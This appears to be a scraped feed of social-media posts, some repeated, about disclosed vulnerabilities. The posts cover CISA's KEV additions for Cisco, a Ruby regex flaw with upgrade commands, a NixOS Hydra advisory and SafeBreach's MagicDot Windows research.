#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
> スクリプト言語「Ruby」の開発チームは4月23日、「Ruby」の正規表現(Regex)検索に任意のメモリアドレスを読み取られる脆弱性(CVE-2024-27282)があることを明らかにした。修正版がリリースされている。
「Ruby 3」系統の正規表現コンパイラーに情報漏えいの脆弱性、修正版がリリース
v3.0.7、v3.1.5、v3.2.4、v3.3.1への更新を
https://forest.watch.impress.co.jp/docs/news/1586881.html
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.
https://github.com/NixOS/hydra/security/advisories/GHSA-2p75-6g9f-pqgx
Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...
##Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.
https://github.com/NixOS/hydra/security/advisories/GHSA-2p75-6g9f-pqgx
Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##